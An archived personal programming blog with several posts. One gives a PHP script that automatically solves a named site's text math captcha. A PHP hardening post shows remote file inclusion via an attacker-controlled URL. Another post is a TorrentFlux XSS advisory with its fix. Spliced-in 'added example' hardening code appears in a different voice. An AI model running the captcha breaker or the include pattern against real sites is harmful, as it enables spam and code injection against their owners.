Archive for Programming

Breaking Text Based Captcha is Easy!

Today, I still don't remember how I got to this blog post, but anyway I saw that they had a text-based captcha.

The blog author claims that it prevents spam, which it does! It adds an extra layer of uniqueness to his code that generic spam bots don't recognise. Anyway, now for the breaking:

<?php
// Break Text Based Captcha:
// The pattern picks "<number> <operator> <number> =" out of the page HTML
// that follows a self-closing tag.
$regex = '#/>\s+(\d+)\s*([\+\-\/\*])\s*(\d+)\s*\=?\s+#';

// getpage() is the author's own cURL wrapper (see the note below).
$page = getpage('http://pooteeweet.org/blog/259/p/1');

preg_match($regex, $page, $matches);
$n1 = intval($matches[1]);
$n2 = intval($matches[3]);

$op = $matches[2];

switch ($op) {
case '+':
$INTresult = intval($n1+$n2);
break;

case '-':
$INTresult = intval($n1-$n2);
break;

case '/':
$INTresult = intval($n1/$n2);
break;

case '*':
$INTresult = intval($n1*$n2);
break;

default:
die('Illegal Operation');
break;
}

echo $INTresult;
?>

Note that my framework has a function getpage() which is just a simple (well, quite advanced actually...) cURL function.

There you have it: $INTresult is the answer to the math problem.

Yes, this is a very simple text captcha, but breaking a more advanced one wouldn't require much more effort.

Regards,

Steven Roddis

2 Easy Steps to Increase Security in PHP

I get a lot of questions regarding how to increase security in their PHP apps.

Aside from the obvious (write secure code), there are two easy "switches that you can flick".

Disable: URL fopen wrappers

This prevents most exploitation of the classic file inclusion vulnerability.

e.g. include($foo.'bar.php');

Now if $foo is set to 'http://www.stevenroddis.com/evil?'

The script grabs PHP code from "http://www.stevenroddis.com/evil?bar.php"

But if URL fopen wrappers are off, then the hacker can only use files already on your server (still with limitations, such as the appended string).

However, there is a downside: some applications use URL wrappers to download data off the web. You can work around it by using cURL instead, but you might not want to.

How?

php.ini (most people won’t have access to this)

allow_url_fopen off

.htaccess

php_flag allow_url_fopen off

Turn Off: Register Globals

Yes, it is off by default but the number of sites that get hacked due to it being on is astounding. Register Globals is not needed in 99.99% of PHP apps.

How?

php.ini (most people won’t have access to this)

register_globals off

.htaccess

php_flag register_globals off

#3 Bonus: Turn off Error Reporting

A lot of sites display error messages that leak sensitive information, which can make it easier to find a security hole and/or exploit it.

How?

php.ini (most people won’t have access to this)

display_errors Off

.htaccess

php_flag display_errors Off

Enforce these in your web app:

Don't let stupid configuration changes bring down your defences: inside your PHP application, make sure you die() and give some [nice] error when, say, register globals is turned back on.

Code:

if (@ini_get('register_globals'))
{
die();
}

You might want to do the same for allow_url_fopen (replace "register_globals" in the above with "allow_url_fopen").
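The runtime check described above, extended to all three settings and paired with an allowlisted include as the hardened form of the include($foo.'bar.php') pattern from earlier in the post. This is an added example, not the post's own code; the function names, the page map and the pages/ directory next to the script are assumptions made for the example.

```php
<?php
// Added example, not code from the original post. Enforces at runtime the
// three settings the post tells you to switch off, and shows the include
// pattern the post warns about beside an allowlisted version.
// Assumptions for this example: the function names, the page map, and a
// pages/ directory next to this script.

// Returns the names of the dangerous settings that are currently enabled.
// ini_get() yields "" or "0" for off, "1" for on, and false when the setting
// does not exist at all (register_globals was removed in PHP 5.4).
function hardening_violations()
{
    $must_be_off = array('register_globals', 'allow_url_fopen', 'display_errors');
    $enabled = array();
    foreach ($must_be_off as $name) {
        $value = @ini_get($name);
        if ($value !== false && filter_var($value, FILTER_VALIDATE_BOOLEAN)) {
            $enabled[] = $name;
        }
    }
    return $enabled;
}

// The vulnerable pattern from the post, kept only for comparison and never
// called: the raw parameter becomes part of the include path, so with URL
// wrappers on the code can come from any host, and with them off it can
// still come from any readable local file.
function include_page_unsafe($foo)
{
    include $foo . 'bar.php';
}

// Hardened version: the request parameter is only ever used as a key into a
// fixed map, and the file is always loaded from one directory under __DIR__.
function include_page_safe($name)
{
    $pages = array(
        'home'    => 'home.php',
        'about'   => 'about.php',
        'contact' => 'contact.php',
    );
    // A non-string (e.g. ?page[]=x) or an unknown name is simply rejected.
    if (!is_string($name) || !isset($pages[$name])) {
        header('HTTP/1.1 404 Not Found');
        return false;
    }
    include __DIR__ . '/pages/' . $pages[$name];
    return true;
}

// Refuse to run at all if a setting has been switched back on. The detail
// goes to the server log; the visitor only sees a generic message.
$violations = hardening_violations();
if ($violations) {
    error_log('Hardening check failed, enabled: ' . implode(', ', $violations));
    die('This application cannot run with the current server configuration.');
}

$page = isset($_GET['page']) ? $_GET['page'] : 'home';
if (!include_page_safe($page)) {
    echo 'Page not found.';
}
```

The point of the allowlist is that nothing from the request ever reaches the filesystem or a URL wrapper as a path fragment, so the include stays safe whether or not allow_url_fopen is later switched back on; the ini check is the second line of defence the post asks for, with the specific setting names logged rather than shown to the visitor.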

There you have it: two (well, four) easy and simple steps to greatly increase security in your PHP application. (Three of them don't require changing your code.)

Regards,

Steven Roddis

/bin/rm: Argument list too long.

After forgetting to add "2>&1" to the end of my cron job that runs every minute, I ended up with a lot of "mail" in my Maildir, about 600,000! So I thought that I could do a simple "rm 11*" (each file started with 11).

But I ran into a problem: “Argument list too long.”

So after researching this problem I found out why (It has to do with not being able to fit the supplied argument list and environment into the 128K buffer)

I also found a solution: find . -name '11*' | xargs rm

Three minutes later my Maildir was clear!

Regards,

Steven Roddis

TorrentFlux User-Agent XSS Vulnerability

Name: TorrentFlux User-Agent XSS Vulnerability
Published: 2006-10-06
Critical Level: Moderate
Type: Cross-Site Scripting
Where: Remote
Status: 0-Day
Software: Torrentflux 2.1
Discoverer: Steven Roddis (http://www.stevenroddis.com)

I gave the authors of this product a week (more than usual) just to contact me; they have failed to do so, so I am releasing this vulnerability publicly!

/admin.php

Line: 325

$ip_info = $ip_resolved."
".$user_agent;

The User-Agent is not escaped.

Solution:

Edit source code:

/admin.php

Line: 325:

$ip_info = htmlentities($ip_resolved, ENT_QUOTES)."
".htmlentities($user_agent, ENT_QUOTES);
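The same output-escaping fix as a small self-contained script, added here as an example and not TorrentFlux's own code. It uses htmlspecialchars() with an explicit charset rather than the advisory's htmlentities(); both neutralise the characters that matter here. The helper names and the sample User-Agent value are assumptions constructed for the example.

```php
<?php
// Added example, not TorrentFlux code. Shows the admin.php line from the
// advisory beside an escaped version, using a constructed User-Agent value.
// The helper names and the sample header value are assumptions.

// Escape a string for insertion into HTML body or attribute context.
// ENT_QUOTES covers both quote characters; the explicit charset avoids
// relying on the default, which changed between PHP versions.
function html_escape($s)
{
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

// Builds the "<resolved host>\n<user agent>" text that admin.php renders.
function ip_info_line($ip_resolved, $user_agent)
{
    return html_escape($ip_resolved) . "\n" . html_escape($user_agent);
}

// Constructed sample: a header value carrying markup. Anything the client
// sends, request headers included, is untrusted input.
$ip_resolved = 'host.example.invalid';
$user_agent  = 'Mozilla/5.0 <b>(markup in header)</b>';

// Unescaped, as in the vulnerable line: the tag reaches the browser as HTML.
$vulnerable = $ip_resolved . "\n" . $user_agent;

// Escaped: the same bytes render as visible text.
$fixed = ip_info_line($ip_resolved, $user_agent);

echo $vulnerable, "\n---\n", $fixed, "\n";
```

Escaping belongs at the point of output, where the context (HTML body here) is known; storing the header unescaped in the log table is fine as long as every place that renders it goes through the same helper.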

A “Y2K bug” in a Modern App?

Yes, it isn't a Y2K bug per se.

This shows that there are some stupid people out there:

Y2K Bug Image

Note what is really happening is str = '19'+'106';

Two things come to mind:

a) They stole some really, really, really old code

b) They are just plain stupid!

Well it turns out that it was b):

The code:

<script language="JavaScript1.2">
var mydate=new Date()
var year=mydate.getYear()
if (year<2000) year="19"+year
var day=mydate.getDay()
var month=mydate.getMonth()
var daym=mydate.getDate()
if (daym<10) daym="0"+daym
var dayarray=new Array("Sun","Mon","Tues","Wed","Thur","Fri","Sat")
var montharray=new Array("January","February","March","April","May","June","July","August","September","October","November","December")
document.write("<font size='2' face='Arial' color='#000000'>"+dayarray[day]+", "+montharray[month]+" "+daym+", "+year+"</font>")
</script>

The problem was that they wrote if(year<2000). getYear() returns the number of years after 1900, so the "19" is concatenated as a string rather than added.

So it should be:

year = year+1900

Problem Fixed! (It was just really funny to see it, in this day and age! :) )

Steven

WP-Cache Blank Page of Doom

If any of you have tried to enable caching because your site just can't handle the traffic when it hits the front page:

The WP-Cache plugin for WordPress is an excellent option for PHP 4 and an almost perfect option for PHP 5, with one tiny exception: the Blank Page of Doom. Fortunately there is an extremely easy fix.

Edit: /wp-content/plugins/wp-cache/wp-cache-phase2.php

And do a simple find and replace on:

Find: ob_end_clean(); Replace: ob_end_flush();

This is because WP-Cache was built for PHP 4.

Now enjoy the blazing fast speed WP-Cache provides!

Regards,

Steven Roddis

Back; Well… yeah, back!

After not being bothered to update my weblog, I have decided to update it…

I have moved everything to a different server and enabled caching, which will mean a lot faster page loading!

So what is in store??

Hacks, cracks, and exploits (well, hacks and exploits): only the legal stuff, such as laser audio transmitters and the like (old-school hacking). And exploits; however, I have a policy of notifying the producers of the flawed product, and only if they don't respond or don't fix it in enough time (e.g. file inclusion = ~3 days) does the exploit get released publicly. If the author of the product genuinely needs more time, then upon assessment they may be given it. So you will only see it after the conditions above are met.

Regards,
Steven Roddis

The do's and don'ts of user info collecting on the web.

Users fill out many forms a day; whether it is just logging in, signing up or something else, the user has to repetitively enter his or her information. The worst example that I have found is Microsoft; let's look at the steps to get a free USB drive from them. (The same thing applies to pretty much, if not all, forms that Microsoft has.) You need to sign in with your Passport. OK, I have entered all the information except for the answers to the questions, many times before, so why can't they just ask me for the answers instead of asking me for everything again? I have seen some sites where they try to help you, either by having a checkbox that you can check to say your billing address is the same as your postal address, or you get the same big form but some of the info that they already have on you is filled in. Let's start with the first thing in that sentence: the checkbox to say that your billing address is the same as your postal address. The problem I have with some of the sites is that I paid via PayPal, and see no need for a billing address. Furthermore, I am constantly asked for my phone number (as a required field) but I see no reason for them to ring me. An example is an online advertising company, who asked me for my phone number. (I was a publisher with them.) But I could never see them calling me, as they had my email, and I live in Australia so it would cost a bit more for a call

A fix for a flaw in most Javascripts.

N.B. This is to fix the Client Side stuff, NOT server side things.

Problem:

Consider this:

<script type="text/javascript">
<!--
var text = '<script>alert(\'Boo!\');</script>';
document.write(text);
-->
</script>

See the problem: any input, however it is obtained (e.g. from a form), isn't converted into text but is written out as HTML.

Yes, I know that this doesn't pose a great security risk, as the client has to type it in; however, that is no excuse!

Petition to Get Rid of Magic Quotes in PHP

We, the undersigned, want PHP to not just turn off "Magic Quotes" but to drop the feature entirely. It is an annoyance to developers, who have to write more code just because of this "feature".

Sign Here
